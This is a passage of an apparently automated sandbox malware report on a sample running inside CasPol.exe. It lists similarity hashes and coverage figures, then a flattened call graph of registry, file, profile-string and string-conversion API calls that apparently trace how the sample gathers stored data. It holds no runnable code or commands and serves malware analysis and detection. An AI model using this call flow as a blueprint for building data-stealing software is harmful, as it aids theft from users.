                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3510742995-0
                                                                                                                                                                                  • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                  • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                                                                                  • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$memset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1860491036-0
                                                                                                                                                                                  • Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                  • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                                                                                                                  • Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040797A
                                                                                                                                                                                  • free.MSVCRT ref: 0040799A
                                                                                                                                                                                    • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                    • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                    • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                  • free.MSVCRT ref: 004079BD
                                                                                                                                                                                  • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3669619086-0
                                                                                                                                                                                  • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                  • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                                                                                                  • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                  • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:13.8%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:4.2%
                                                                                                                                                                                  Signature Coverage:2.7%
                                                                                                                                                                                  Total number of Nodes:1726
                                                                                                                                                                                  Total number of Limit Nodes:46
7347 411d82 RegQueryValueExA 7346->7347 7348 40275e 7347->7348 7349 40282d RegCloseKey 7348->7349 7350 40276a strtoul 7348->7350 7349->6739 7350->7350 7351 402794 7350->7351 7352 4027ee _mbscpy _mbscpy 7351->7352 7352->7349 7353->6739 7365 411d68 RegOpenKeyExA 7354->7365 7356 413772 7357 40da13 7356->7357 7358 411d82 RegQueryValueExA 7356->7358 7357->6746 7357->6749 7359 41378b 7358->7359 7360 4137bc RegCloseKey 7359->7360 7361 411d82 RegQueryValueExA 7359->7361 7360->7357 7362 4137a6 7361->7362 7362->7360 7366 413a5a 7362->7366 7365->7356 7378 413646 strlen 7366->7378 7368 413a73 7369 413a92 7368->7369 7380 4137ce 7368->7380 7373 4137ba 7369->7373 7409 413b1d memset memset memset 7369->7409 7372 413aab 7372->7373 7374 413acb memset 7372->7374 7373->7360 7375 4137ce 21 API calls 7374->7375 7376 413afc 7375->7376 7376->7373 7377 413b05 _mbscpy 7376->7377 7377->7373 7379 413665 7378->7379 7379->7368 7381 414060 7380->7381 7382 4137db memset 7381->7382 7383 413646 strlen 7382->7383 7384 413809 strlen 7383->7384 7385 413a51 7384->7385 7386 413822 7384->7386 7385->7369 7386->7385 7387 41382a memset memset memset memset 7386->7387 7388 4138a4 7387->7388 7424 40c929 7388->7424 7390 4138b2 7431 40c9c7 7390->7431 7392 4138c1 memcpy 7393 4138dd 7392->7393 7394 40c929 3 API calls 7393->7394 7395 4138ee 7394->7395 7396 40c9c7 5 API calls 7395->7396 7397 4138fa memcpy memcpy 7396->7397 7398 413928 7397->7398 7399 40c929 3 API calls 7398->7399 7400 413939 7399->7400 7401 40c9c7 5 API calls 7400->7401 7403 413945 7401->7403 7402 4139e2 _mbscpy 7404 413a00 7402->7404 7403->7402 7403->7403 7405 40c929 3 API calls 7404->7405 7406 413a0e 7405->7406 7407 40c9c7 5 API calls 7406->7407 7408 413a1a memcpy memcpy 7407->7408 7408->7385 7410 413646 strlen 7409->7410 7411 413b81 strlen 7410->7411 7412 413b99 7411->7412 7423 413c28 7411->7423 7413 413ba1 memcpy memcpy 7412->7413 7412->7423 7414 413bcf 7413->7414 7415 40c929 3 API calls 7414->7415 7416 413be1 7415->7416 7417 40c9c7 5 API calls 
7416->7417 7418 413bf0 memcpy 7417->7418 7419 413c0e 7418->7419 7420 40c929 3 API calls 7419->7420 7421 413c1f 7420->7421 7422 40c9c7 5 API calls 7421->7422 7422->7423 7423->7372 7425 40c940 7424->7425 7426 40c960 memcpy 7425->7426 7427 40c967 memcpy 7425->7427 7430 40c97e 7425->7430 7426->7390 7427->7430 7428 40c98d memcpy 7428->7430 7430->7426 7430->7428 7432 40c9e1 memset 7431->7432 7433 40ca07 memset 7431->7433 7438 40ca46 7432->7438 7435 40ca16 7433->7435 7437 40ca2c memcpy memset 7435->7437 7436 40c9f7 memset 7436->7435 7437->7392 7438->7436 7454 411d68 RegOpenKeyExA 7439->7454 7441 40d7b8 7442 40d7c3 memset 7441->7442 7443 40d92b 7441->7443 7445 40d7f1 7442->7445 7443->6753 7443->6754 7446 40d922 RegCloseKey 7445->7446 7448 40d80f RegQueryValueExA 7445->7448 7449 40d8f9 RegCloseKey 7445->7449 7451 40d85a memset 7445->7451 7453 40d88b _mbscpy _mbscpy 7445->7453 7455 411d68 RegOpenKeyExA 7445->7455 7467 411dee RegEnumKeyExA 7445->7467 7446->7443 7448->7449 7450 40d839 atoi 7448->7450 7449->7445 7450->7445 7450->7449 7456 40807d memcpy memcpy 7451->7456 7453->7445 7454->7441 7455->7445 7457 4080b0 7456->7457 7458 40c929 3 API calls 7457->7458 7459 4080bf 7458->7459 7460 40c9c7 5 API calls 7459->7460 7461 4080cb 7460->7461 7461->7461 7462 40810c memset 7461->7462 7465 408194 7461->7465 7464 408138 7462->7464 7463 40815f strlen 7463->7465 7466 40816b _mbscpy _mbscpy 7463->7466 7464->7463 7465->7445 7466->7465 7467->7445 7469 407dc4 7468->7469 7470 411d68 RegOpenKeyExA 7469->7470 7470->6760 7471->6766 7472->6766 7475 407e51 7473->7475 7474 407f77 RegCloseKey 7474->6766 7475->7474 7476 407e65 memset 7475->7476 7477 407e96 7476->7477 7478 404c9d 3 API calls 7477->7478 7481 407ede 7478->7481 7479 407f6f 7480 404ce0 FreeLibrary 7479->7480 7480->7474 7481->7479 7482 407f25 memcpy 7481->7482 7483 406958 2 API calls 7482->7483 7484 407f59 LocalFree 7483->7484 7484->7479 7486->6766 7487->6775 7488->6781 7489->6781 7491 407b01 7490->7491 7492 407bbf RegCloseKey 7490->7492 
7493 404c9d 3 API calls 7491->7493 7492->6781 7495 407b12 7493->7495 7494 404ce0 FreeLibrary 7494->7492 7496 407b3e WideCharToMultiByte LocalFree 7495->7496 7502 407baa 7495->7502 7497 411d82 RegQueryValueExA 7496->7497 7498 407b87 7497->7498 7499 411d82 RegQueryValueExA 7498->7499 7500 407b9c 7499->7500 7501 406958 2 API calls 7500->7501 7501->7502 7502->7494 7503->6781 7504->6792 7522 4067ba CreateFileA 7505->7522 7507 410ad6 7508 410ae3 GetFileSize 7507->7508 7509 410b8e 7507->7509 7523 407a56 7508->7523 7509->6793 7511 410b07 7512 407a56 2 API calls 7511->7512 7513 410b1a 7512->7513 7514 406ed6 ReadFile 7513->7514 7515 410b31 7514->7515 7516 410b75 CloseHandle 7515->7516 7518 410b50 WideCharToMultiByte 7515->7518 7545 407a41 7516->7545 7526 4108fa 7518->7526 7520 407a41 ??3@YAXPAX 7520->7509 7522->7507 7524 407a6a ??2@YAPAXI 7523->7524 7525 407a5c ??3@YAXPAX 7523->7525 7524->7511 7525->7524 7527 410907 7526->7527 7528 404c9d 3 API calls 7527->7528 7529 41091d 7528->7529 7530 410925 memset 7529->7530 7531 410ab6 7529->7531 7548 407193 7530->7548 7532 404ce0 FreeLibrary 7531->7532 7534 410abe 7532->7534 7534->7516 7535 410958 7535->7531 7536 41096b memset 7535->7536 7537 407193 memcpy 7535->7537 7539 4109b8 MultiByteToWideChar 7535->7539 7540 4109e0 memset 7535->7540 7542 40720f 2 API calls 7535->7542 7543 410a51 LocalFree 7535->7543 7544 410a2f memcpy 7535->7544 7552 40720f 7536->7552 7537->7535 7539->7535 7541 4029d9 strlen 7540->7541 7541->7535 7542->7535 7543->7535 7544->7543 7546 407a55 7545->7546 7547 407a47 ??3@YAXPAX 7545->7547 7546->7520 7547->7546 7549 4071aa 7548->7549 7551 4071a6 7548->7551 7550 4071d4 memcpy 7549->7550 7549->7551 7550->7551 7551->7535 7553 407221 7552->7553 7556 407228 7552->7556 7553->7535 7554 407236 strchr 7554->7556 7555 407269 memcpy 7555->7556 7556->7553 7556->7554 7556->7555 7557->6798 7558->6807 7559->6807 7561 410eb7 7560->7561 7561->6807 7562->6807 7563->6817 7578 4067ba CreateFileA 7564->7578 7566 405af9 7567 405b02 
GetFileSize 7566->7567 7568 405b53 7566->7568 7569 405b12 7567->7569 7570 405b4a CloseHandle 7567->7570 7568->6819 7571 407a56 2 API calls 7569->7571 7570->7568 7572 405b23 7571->7572 7573 406ed6 ReadFile 7572->7573 7574 405b32 7573->7574 7579 405865 memset 7574->7579 7577 407a41 ??3@YAXPAX 7577->7570 7578->7566 7580 407193 memcpy 7579->7580 7588 4058c3 7580->7588 7581 405ae1 7581->7577 7582 406958 2 API calls 7582->7588 7583 405902 strlen 7583->7588 7584 40593d memset memset 7584->7588 7585 4070e4 strlen strlen memcmp 7585->7588 7586 407193 memcpy 7586->7588 7588->7581 7588->7582 7588->7583 7588->7584 7588->7585 7588->7586 7589 406d5a strtoul 7588->7589 7589->7588 7591 40f9b6 7590->7591 7641 40fa34 7591->7641 7594 40fa27 7654 40733e free free 7594->7654 7596 40e6a8 strrchr 7596->6824 7599 40f9d1 7600 40fa11 7599->7600 7655 406d2b 7599->7655 7600->7594 7601 406958 2 API calls 7600->7601 7602 40fa26 7601->7602 7602->7594 7686 410c4c memset 7603->7686 7606 406521 memset 7608 406958 2 API calls 7606->7608 7607 4066d9 7638 410d6f 7607->7638 7609 40654d 7608->7609 7610 40656e memset memset memset strlen strlen 7609->7610 7635 4066c1 7609->7635 7611 4065d5 7610->7611 7612 4065e4 strlen strlen 7610->7612 7614 406b4b 4 API calls 7611->7614 7616 40661d strlen strlen 7612->7616 7617 40660e 7612->7617 7613 410d6f 2 API calls 7613->7607 7614->7612 7620 406647 7616->7620 7621 406656 7616->7621 7618 406b4b 4 API calls 7617->7618 7618->7616 7622 406b4b 4 API calls 7620->7622 7696 4069d3 GetFileAttributesA 7621->7696 7622->7621 7624 40666d 7625 406681 7624->7625 7626 406672 7624->7626 7716 4069d3 GetFileAttributesA 7625->7716 7697 4062db 7626->7697 7629 40668d 7630 4066a1 7629->7630 7631 406692 7629->7631 7717 4069d3 GetFileAttributesA 7630->7717 7632 4062db 21 API calls 7631->7632 7632->7630 7634 4066ad 7634->7635 7636 4066b2 7634->7636 7635->7613 7637 4062db 21 API calls 7636->7637 7637->7635 7639 410d74 SetCurrentDirectoryA FreeLibrary 7638->7639 7640 40e71c 7638->7640 
7639->7640 7640->6829 7642 40fa48 7641->7642 7660 40fc4f memset memset 7642->7660 7644 40fa4e 7645 40fb5b 7644->7645 7647 40fa66 memset 7644->7647 7649 40fa8a strlen strlen 7644->7649 7650 406b4b strlen _mbscat _mbscpy _mbscat 7644->7650 7651 40faec strlen strlen 7644->7651 7652 4069d3 GetFileAttributesA 7644->7652 7653 407364 7 API calls 7644->7653 7673 40733e free free 7645->7673 7647->7644 7648 40f9bc 7648->7594 7648->7599 7649->7644 7650->7644 7651->7644 7652->7644 7653->7644 7654->7596 7685 4067ba CreateFileA 7655->7685 7657 406d38 7658 406d55 CompareFileTime 7657->7658 7659 406d3f GetFileTime CloseHandle 7657->7659 7658->7599 7659->7658 7661 41223f 10 API calls 7660->7661 7662 40fc9e 7661->7662 7663 40680e 2 API calls 7662->7663 7664 40fca5 _mbscat 7663->7664 7665 41223f 10 API calls 7664->7665 7666 40fcc6 7665->7666 7667 40680e 2 API calls 7666->7667 7668 40fccd _mbscat 7667->7668 7674 40fb6a 7668->7674 7671 40fb6a 22 API calls 7672 40fcfa 7671->7672 7672->7644 7673->7648 7675 40783b 9 API calls 7674->7675 7684 40fb9e 7675->7684 7676 40fc3e 7677 407930 FindClose 7676->7677 7678 40fc49 7677->7678 7678->7671 7679 407364 7 API calls 7679->7684 7680 40783b 9 API calls 7680->7684 7681 407898 9 API calls 7681->7684 7682 407800 strcmp strcmp 7682->7684 7683 407930 FindClose 7683->7684 7684->7676 7684->7679 7684->7680 7684->7681 7684->7682 7684->7683 7685->7657 7718 405ec5 memset memset 7686->7718 7689 406519 7689->7606 7689->7607 7690 410c8d GetCurrentDirectoryA SetCurrentDirectoryA memset strlen strlen 7691 410cf3 LoadLibraryExA 7690->7691 7692 410cdc 7690->7692 7691->7689 7695 410d17 6 API calls 7691->7695 7693 406b4b 4 API calls 7692->7693 7693->7691 7695->7689 7696->7624 7698 4062e8 7697->7698 7750 4067ba CreateFileA 7698->7750 7700 4062f3 7701 406302 GetFileSize 7700->7701 7702 4064f4 7700->7702 7703 406316 ??2@YAPAXI 7701->7703 7704 4064eb CloseHandle 7701->7704 7702->7625 7705 406ed6 ReadFile 7703->7705 7704->7702 7706 40632c memset memset memset 7705->7706 
7751 4060c4 7706->7751 7708 4064e2 ??3@YAXPAX 7708->7704 7709 4063ad strcmp 7711 406395 7709->7711 7710 4060c4 memcpy 7710->7711 7711->7708 7711->7709 7711->7710 7712 40644e _mbscpy 7711->7712 7713 40645d _mbscpy 7711->7713 7715 4064a7 strcmp 7711->7715 7712->7711 7755 40623f 7713->7755 7715->7711 7716->7629 7717->7634 7740 411d68 RegOpenKeyExA 7718->7740 7720 405f1c 7721 406072 _mbscpy 7720->7721 7722 405f27 memset 7720->7722 7724 406085 ExpandEnvironmentStringsA 7721->7724 7725 4060b0 7721->7725 7741 411dee RegEnumKeyExA 7722->7741 7726 405e4a 8 API calls 7724->7726 7725->7689 7725->7690 7727 406098 7726->7727 7727->7725 7731 4060a2 GetCurrentDirectoryA 7727->7731 7728 406069 RegCloseKey 7728->7721 7729 405f5a _mbsnbicmp 7730 405f78 memset memset _snprintf 7729->7730 7736 405f52 7729->7736 7734 411dae 3 API calls 7730->7734 7732 405e4a 8 API calls 7731->7732 7732->7725 7735 405fd9 _mbsrchr 7734->7735 7735->7736 7736->7728 7736->7729 7738 406004 _mbsicmp 7736->7738 7742 405e4a memset strlen strlen 7736->7742 7748 411dee RegEnumKeyExA 7736->7748 7738->7736 7739 40601d _mbscpy _mbscpy 7738->7739 7739->7736 7740->7720 7741->7736 7743 405e91 7742->7743 7744 405ea0 7742->7744 7745 406b4b 4 API calls 7743->7745 7749 4069d3 GetFileAttributesA 7744->7749 7745->7744 7747 405eb7 7747->7736 7748->7736 7749->7747 7750->7700 7752 4060db 7751->7752 7754 4060d7 7751->7754 7753 406106 memcpy 7752->7753 7752->7754 7753->7754 7754->7711 7756 40624c 7755->7756 7757 406259 _mbscpy 7756->7757 7763 406143 7757->7763 7760 406143 3 API calls 7761 406290 _mbscpy _mbscpy _mbscpy 7760->7761 7762 4062d6 7761->7762 7762->7711 7764 406163 7763->7764 7765 406174 7763->7765 7766 406180 memset 7764->7766 7767 40616c 7764->7767 7765->7760 7769 4029d9 strlen 7766->7769 7768 4029d9 strlen 7767->7768 7768->7765 7770 4061a7 7769->7770 7770->7765 7771 406214 memcpy 7770->7771 7771->7765 7773 4085c6 7772->7773 7801 40733e free free 7773->7801 7775 408602 7802 40821a 7775->7802 7777 4085d3 7777->7775 
7825 407407 7777->7825 7781 4086db 7789 40733e free free 7781->7789 7782 4086d3 7783 404d18 7 API calls 7782->7783 7783->7781 7784 408649 MultiByteToWideChar _wcslwr 7830 408490 7784->7830 7787 408610 7787->7781 7787->7782 7787->7784 7788 408490 17 API calls 7787->7788 7788->7787 7789->6836 7791 4081b7 7790->7791 7792 4081ac FreeLibrary 7790->7792 7793 407491 free 7791->7793 7792->7791 7794 4081c0 7793->7794 7868 40733e free free 7794->7868 7796 4081c8 7869 40733e free free 7796->7869 7798 4081d0 7870 40733e free free 7798->7870 7800 4081d8 7801->7777 7844 40733e free free 7802->7844 7804 408233 7845 411d68 RegOpenKeyExA 7804->7845 7806 408246 7807 408251 7806->7807 7808 408356 7806->7808 7809 40746b 4 API calls 7807->7809 7822 404d18 7808->7822 7810 408269 memset 7809->7810 7846 4074aa 7810->7846 7813 40834c RegCloseKey 7813->7808 7814 4082bd 7815 4082c6 _strupr 7814->7815 7816 407364 7 API calls 7815->7816 7817 4082e4 7816->7817 7818 407364 7 API calls 7817->7818 7819 4082f8 memset 7818->7819 7820 4074aa 7819->7820 7821 408327 RegEnumValueA 7820->7821 7821->7813 7821->7815 7823 404d79 7822->7823 7824 404d1d 7 API calls 7822->7824 7823->7787 7824->7823 7848 407428 7825->7848 7828 407424 7828->7777 7829 407364 7 API calls 7829->7828 7831 404d18 7 API calls 7830->7831 7832 4084a6 7831->7832 7833 4085a8 wcslen 7832->7833 7834 4084cb wcslen 7832->7834 7833->7787 7835 404d18 7 API calls 7834->7835 7837 4084e4 7835->7837 7836 40859e 7839 404d18 7 API calls 7836->7839 7837->7836 7838 404d18 7 API calls 7837->7838 7840 40851d 7838->7840 7839->7833 7840->7836 7841 40853a memset 7840->7841 7842 408560 7841->7842 7852 4083d0 7842->7852 7844->7804 7845->7806 7847 4074b0 RegEnumValueA 7846->7847 7847->7813 7847->7814 7849 40742e 7848->7849 7850 407437 strcmp 7849->7850 7851 407413 7849->7851 7850->7849 7850->7851 7851->7828 7851->7829 7853 407428 strcmp 7852->7853 7854 4083e3 7853->7854 7855 40848a 7854->7855 7856 40841f wcslen 7854->7856 7855->7836 7857 404c9d 3 API calls 
7856->7857 7860 408447 7857->7860 7858 408482 7859 404ce0 FreeLibrary 7858->7859 7859->7855 7860->7858 7861 408479 LocalFree 7860->7861 7863 40835f 7860->7863 7861->7858 7864 4083c9 7863->7864 7867 408377 7863->7867 7864->7861 7865 408382 wcslen 7865->7864 7866 40839b wcslen 7865->7866 7866->7867 7867->7864 7867->7865 7868->7796 7869->7798 7870->7800 7872 40e506 7871->7872 7873 40e515 7871->7873 7874 406b4b 4 API calls 7872->7874 7879 4069d3 GetFileAttributesA 7873->7879 7874->7873 7876 40e52c 7877 40e540 7876->7877 7880 40e293 7876->7880 7877->6841 7877->6843 7879->7876 7895 4067ba CreateFileA 7880->7895 7882 40e2a7 7883 40e2b4 GetFileSize 7882->7883 7884 40e4ac 7882->7884 7885 40e4a3 CloseHandle 7883->7885 7886 40e2cc ??2@YAPAXI memset ReadFile 7883->7886 7884->7877 7885->7884 7893 40e314 7886->7893 7887 407193 memcpy 7887->7893 7888 40e49c ??3@YAXPAX 7888->7885 7889 407139 strlen strlen _memicmp 7889->7893 7890 40e39b memcpy memcpy 7891 407139 3 API calls 7890->7891 7891->7893 7892 406958 2 API calls 7892->7893 7893->7887 7893->7888 7893->7889 7893->7890 7893->7892 7894 4029d9 strlen 7893->7894 7894->7893 7895->7882 7897 414060 7896->7897 7898 40dd72 memset strlen strlen 7897->7898 7899 40ddbe 7898->7899 7900 40ddad 7898->7900 7910 4069d3 GetFileAttributesA 7899->7910 7901 406b4b 4 API calls 7900->7901 7901->7899 7903 40ddd4 7904 40dddd 7 API calls 7903->7904 7905 40dfcf 7903->7905 7904->7905 7908 40dea4 7904->7908 7905->6851 7907 406958 strlen memcpy 7907->7908 7908->7905 7908->7907 7909 40df4c sprintf GetPrivateProfileStringA GetPrivateProfileStringA 7908->7909 7911 40dcf2 7908->7911 7909->7905 7909->7908 7910->7903 7912 40dd0d 7911->7912 7913 40dd54 7912->7913 7914 40dd1f strtoul 7912->7914 7913->7908 7914->7912 7914->7913 7915->6882 7975 406d91 memset 7916->7975 7918 412d78 ??2@YAPAXI 7919 412d87 7918->7919 7920 412d90 ??2@YAPAXI 7919->7920 7921 412da2 7920->7921 7922 412dab ??2@YAPAXI 7921->7922 7923 412dc2 ??2@YAPAXI 7922->7923 7925 412de6 ??2@YAPAXI 
7923->7925 7927 40ebd8 7925->7927 7928 412f02 7927->7928 7976 4067ba CreateFileA 7928->7976 7930 412f0f 7931 412f44 7930->7931 7932 412f17 GetFileSize 7930->7932 7931->6886 7977 412ed6 7932->7977 7934 412f28 7935 406ed6 ReadFile 7934->7935 7936 412f34 CloseHandle 7935->7936 7936->7931 7980 4075ad MultiByteToWideChar 7937->7980 7940 412fa1 7942 407491 free 7940->7942 7941 412ed6 2 API calls 7943 412f85 memcpy 7941->7943 7944 40ec08 7942->7944 7943->7940 7946 40d1a5 7944->7946 7947 413095 7946->7947 7995 40733e free free 7947->7995 7949 4130c7 7996 40733e free free 7949->7996 7951 4133aa 7951->6887 7952 40746b 4 API calls 7954 4130d2 7952->7954 7953 412fb0 19 API calls 7953->7954 7954->7951 7954->7952 7954->7953 7955 41322b memcpy 7954->7955 7997 412768 7954->7997 7955->7954 7958 412e65 7957->7958 7959 412e5a ??3@YAXPAX 7957->7959 7960 412e7c 7958->7960 7961 407491 free 7958->7961 7959->7958 7962 407491 free 7960->7962 7964 412e92 7960->7964 7965 412e75 ??3@YAXPAX 7961->7965 7966 412e8b ??3@YAXPAX 7962->7966 7963 412ea8 7968 412ebe 7963->7968 8006 40733e free free 7963->8006 7964->7963 7967 407491 free 7964->7967 7965->7960 7966->7964 7969 412ea1 ??3@YAXPAX 7967->7969 7971 412ed4 7968->7971 8007 40733e free free 7968->8007 7969->7963 7971->6876 7972 412eb7 ??3@YAXPAX 7972->7968 7974 412ecd ??3@YAXPAX 7974->7971 7975->7918 7976->7930 7978 412ee0 ??3@YAXPAX 7977->7978 7979 412eeb ??2@YAPAXI 7977->7979 7978->7979 7979->7934 7981 407634 7980->7981 7982 4075d7 7980->7982 7981->7940 7981->7941 7983 40746b 4 API calls 7982->7983 7984 4075f5 MultiByteToWideChar 7983->7984 7986 407614 7984->7986 7987 40762a 7984->7987 7990 407564 WideCharToMultiByte 7986->7990 7988 407491 free 7987->7988 7988->7981 7991 4075a4 7990->7991 7992 407586 7990->7992 7991->7987 7993 40746b 4 API calls 7992->7993 7994 407590 WideCharToMultiByte 7993->7994 7994->7991 7995->7949 7996->7954 7998 412d44 7997->7998 8001 412b5d 7997->8001 7998->7954 7999 412b83 strlen strncmp 7999->8001 8000 412cc0 strlen 
strncmp 8000->8001 8001->7998 8001->7999 8001->8000 8002 412c93 memcpy 8001->8002 8003 412c0b memcpy atoi WideCharToMultiByte 8001->8003 8005 406d5a strtoul 8002->8005 8003->8001 8005->8001 8006->7972 8007->7974 8008->6899 8009->6919 8020 40f94e 8010->8020 8013 40f946 8013->6919 8014 40f8c8 memcmp 8014->8013 8015 40f8df 8014->8015 8015->8013 8016 40f94e 3 API calls 8015->8016 8019 40f8f5 8016->8019 8017 40f94e 3 API calls 8017->8019 8019->8013 8019->8017 8025 40f689 8019->8025 8021 40f960 SetFilePointer 8020->8021 8022 40f96e memset 8020->8022 8021->8022 8023 406ed6 ReadFile 8022->8023 8024 40f8c4 8023->8024 8024->8013 8024->8014 8026 40f696 8025->8026 8027 40f806 8026->8027 8028 40f94e 3 API calls 8026->8028 8027->8019 8029 40f6ca 8028->8029 8029->8027 8030 40f94e 3 API calls 8029->8030 8031 40f6e7 8030->8031 8032 40f94e 3 API calls 8031->8032 8035 40f779 8031->8035 8034 40f710 _strcmpi 8032->8034 8034->8035 8036 40f734 _strcmpi 8034->8036 8035->8027 8037 40f789 _strcmpi 8035->8037 8055 40f5c1 8035->8055 8036->8035 8038 40f74b _strcmpi 8036->8038 8040 40f80b 8037->8040 8041 40f79d _strcmpi 8037->8041 8038->8035 8039 40f762 _strcmpi 8038->8039 8039->8035 8042 40f5c1 2 API calls 8040->8042 8041->8040 8043 40f7b1 _strcmpi 8041->8043 8045 40f822 8042->8045 8043->8040 8044 40f7c5 _strcmpi 8043->8044 8044->8040 8046 40f7d9 _strcmpi 8044->8046 8045->8027 8047 40f826 _mbscpy 8045->8047 8046->8035 8046->8040 8048 40f84e 8047->8048 8048->8027 8049 40f5c1 2 API calls 8048->8049 8050 40f83a _strcmpi 8048->8050 8049->8048 8050->8048 8051 40f869 8050->8051 8052 40f5c1 2 API calls 8051->8052 8053 40f87f 8052->8053 8053->8027 8054 40f883 _mbscpy 8053->8054 8054->8027 8056 40f649 8055->8056 8057 40f5d8 8055->8057 8056->8035 8057->8056 8058 40f61e memcpy 8057->8058 8058->8056 8059 40f65a 8058->8059 8059->8056 8060 40f666 _ultoa 8059->8060 8060->8056 8061 41208b FindResourceA 8062 4120a4 SizeofResource 8061->8062 8065 4120ce 8061->8065 8063 4120b5 LoadResource 8062->8063 8062->8065 
8064 4120c3 LockResource 8063->8064 8063->8065 8064->8065 5991 412111 EnumResourceNamesA 6020 413e10 6039 414000 6020->6039 6022 413e1c GetModuleHandleA 6023 413e2e __set_app_type __p__fmode __p__commode 6022->6023 6025 413ec0 6023->6025 6026 413ed4 6025->6026 6027 413ec8 __setusermatherr 6025->6027 6040 413fe8 _controlfp 6026->6040 6027->6026 6029 413ed9 _initterm __getmainargs _initterm 6030 413f30 GetStartupInfoA 6029->6030 6032 413f64 GetModuleHandleA 6030->6032 6041 40c66a 6032->6041 6036 413f95 _cexit 6038 413fca 6036->6038 6037 413f8e exit 6037->6036 6039->6022 6040->6029 6094 404d7a LoadLibraryA 6041->6094 6043 40c682 6044 40c686 6043->6044 6102 412192 6043->6102 6044->6036 6044->6037 6049 40c6a4 FreeLibrary 6050 40c6ad EnumResourceTypesA 6049->6050 6051 40c6d8 MessageBoxA 6050->6051 6052 40c6f0 6050->6052 6051->6044 6123 40c427 ??2@YAPAXI 6052->6123 6059 40c73a 6156 409167 memset 6059->6156 6060 40c74e 6161 40902b memset 6060->6161 6065 4077af 2 API calls 6067 40c762 6065->6067 6066 40c8b3 ??3@YAXPAX 6068 40c8d7 6066->6068 6069 40c8cb DeleteObject 6066->6069 6070 40c766 RegDeleteKeyA 6067->6070 6071 40c77b 6067->6071 6182 40733e free free 6068->6182 6069->6068 6070->6066 6071->6066 6074 40c7d5 CoInitialize 6071->6074 6166 40c5a4 6071->6166 6073 40c8e9 6183 407a7a 6073->6183 6181 40c3af RegisterClassA CreateWindowExA 6074->6181 6081 40c7e7 ShowWindow UpdateWindow LoadAcceleratorsA PostMessageA GetMessageA 6087 40c848 6081->6087 6088 40c8ad CoUninitialize 6081->6088 6082 40c7d3 6082->6074 6083 40c7a4 ??3@YAXPAX 6083->6068 6086 40c7c1 DeleteObject 6083->6086 6086->6068 6089 40c84e TranslateAccelerator 6087->6089 6091 40c871 IsDialogMessage 6087->6091 6092 40c87c IsDialogMessage 6087->6092 6088->6066 6089->6087 6090 40c8a0 GetMessageA 6089->6090 6090->6088 6090->6089 6091->6090 6091->6092 6092->6090 6093 40c88c TranslateMessage DispatchMessageA 6092->6093 6093->6090 6095 404da5 GetProcAddress 6094->6095 6096 404dcd 6094->6096 6097 404db5 6095->6097 6098 404dbe 
